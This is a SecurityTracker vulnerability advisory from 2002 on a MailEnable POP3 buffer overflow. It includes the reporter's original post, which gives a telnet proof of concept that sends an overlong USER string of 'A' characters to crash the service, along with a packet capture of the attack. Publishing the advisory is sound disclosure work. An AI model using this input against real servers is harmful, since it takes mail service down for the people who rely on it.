SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   MailEnable Vendors:   MailEnable Pty. Ltd.
MailEnable POP Mail Server Buffer Overflow Lets Remote Users Crash the Server or Execute Arbitrary Code
SecurityTracker Alert ID:  1005662
SecurityTracker URL:  http://securitytracker.com/id/1005662
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Nov 22 2002
Original Entry Date:  Nov 20 2002
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.5015, 1.5018
Description:   A buffer overflow vulnerability was reported in the MailEnable POP e-mail server. A remote user can cause the POP service to crash or possibly execute arbitrary code.

It is reported that a remote user can send a long string of characters as the USER field to the POP server to cause the service to shut down. All current connections will be dropped. No further connections are processed.

The server will reportedly log that an invalid command has been supplied but does not indicate that the service is shutting down.

Another user reports that it is possible for a remote user to execute arbitrary code on the server.

Impact:   A remote user can cause the POP service to crash or cause the server to execute arbitrary code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mailenable.com/ (Links to External Site)
Cause:   Boundary error, Exception handling error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  MailEnable POP3 Server remote shutdown !:/ -newest ~ (and




(My first post, please bare with me.)
-/\-About.-/\-
i guess,
but i am not sure how to find all the technical information but if anyone 
knows what to do i would
like to know, if some one have the time to send a brief mail or 
something :)


pop3 = mailenabled 


-/\-Method-/\-

#telnet xxx.xxx.xxx.xxx 110

(clear screen)
+OK Welcome to MailEnable POP3 Server

(then copy and paste this- 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - and paste it to the 
terminal)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA




-/\-Packet Capture-/\-
xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:765
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 30 6C E2 00 00 80 06 5C DB D9 3D DF 70 D9 3D .0l.....\..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 99 00 00 00 00 70 02 ...y.n.O......p.
0030: FA F0 15 54 00 00 02 04 05 B4 01 01 04 02       ...T..........

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:765
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 30 E3 8B 00 00 80 06 E6 31 D9 3D DF 1E D9 3D .0.......1.=...=
0020: DF 70 00 6E 0B 79 3B 17 72 47 00 4F F5 9A 70 12 .p.n.y;.rG.O..p.
0030: 44 70 1E 65 00 00 02 04 05 B4 01 01 04 02       Dp.e..........

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:795
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 4F E3 8F 00 00 80 06 E6 0E D9 3D DF 1E D9 3D .O.........=...=
0020: DF 70 00 6E 0B 79 3B 17 72 48 00 4F F5 9A 50 18 .p.n.y;.rH.O..P.
0030: 44 70 8B 1F 00 00 2B 4F 4B 20 57 65 6C 63 6F 6D Dp....+OK Welcom
0040: 65 20 74 6F 20 4D 61 69 6C 45 6E 61 62 6C 65 20 e to MailEnable 
0050: 50 4F 50 33 20 53 65 72 76 65 72 0D 0A          POP3 Server..

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:775
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 28 6C E4 00 00 80 06 5C E1 D9 3D DF 70 D9 3D .(l.....\..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 48 50 10 ...y.n.O..;.rHP.
0030: FA F0 94 A8 00 00                               ......

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:27:945
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 28 6C F2 00 00 80 06 5C D3 D9 3D DF 70 D9 3D .(l.....\..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 6F 50 10 ...y.n.O..;.roP.
0030: FA C9 94 A8 00 00                               ......

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:28:276
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 02 22 6D 07 00 00 80 06 5A C4 D9 3D DF 70 D9 3D ."m.....Z..=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F5 9A 3B 17 72 6F 50 18 ...y.n.O..;.roP.
0030: FA C9 1E 3D 00 00 55 53 45 52 20 41 41 41 41 41 ...=..USER AAAAA
0040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00A0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00B0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00C0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00D0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00E0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00F0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01A0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01B0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01C0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01D0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01E0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
01F0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0A AAAAAAAAAAAAAAA.
0230:                                                 

xxx.xxx.xxx.112->xxx.xxx.xxx.30
Time 19:49:33:003
0000: 00 00 1C 00 E1 6C 00 04 75 9C 26 42 08 00 45 00 .....l..u.&B..E.
0010: 00 28 6F 73 00 00 80 06 5A 52 D9 3D DF 70 D9 3D .(os....ZR.=.p.=
0020: DF 1E 0B 79 00 6E 00 4F F7 94 3B 17 72 6F 50 11 ...y.n.O..;.roP.
0030: FA C9 92 AD 00 00                               ......

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:28:466
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 28 E3 BA 00 00 80 06 E6 0A D9 3D DF 1E D9 3D .(.........=...=
0020: DF 70 00 6E 0B 79 3B 17 72 6F 00 4F F7 94 50 10 .p.n.y;.ro.O..P.
0030: 42 76 4B 02 00 00 20 20 20 20 20 20             BvK...      

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:33:003
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 28 E6 A0 00 00 80 06 E3 24 D9 3D DF 1E D9 3D .(.......$.=...=
0020: DF 70 00 6E 0B 79 3B 17 72 6F 00 4F F7 95 50 10 .p.n.y;.ro.O..P.
0030: 42 76 4B 01 00 00 20 20 20 20 20 20             BvK...      

xxx.xxx.xxx.30->xxx.xxx.xxx.112
Time 19:49:33:093
0000: 00 04 75 9C 26 42 00 00 1C 00 E1 6C 08 00 45 00 ..u.&B.....l..E.
0010: 00 28 E6 AD 00 00 80 06 E3 17 D9 3D DF 1E D9 3D .(.........=...=
0020: DF 70 00 6E 0B 79 3B 17 72 6F EC A0 B4 24 50 04 .p.n.y;.ro...$P.
0030: 00 00 E4 A2 00 00 20 20 20 20 20 20             ......      
______________________________________________________________________


-/\-and so on-/\-

So now you probably seen all the misspellings and so on anyway, i hope it 



-/\-Me Me Me.-/\-
Ketil Braun Larsen.
www.nerds-united.com
Edu.
www.It-collge.dk

"Guess that where to late huh?"







 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC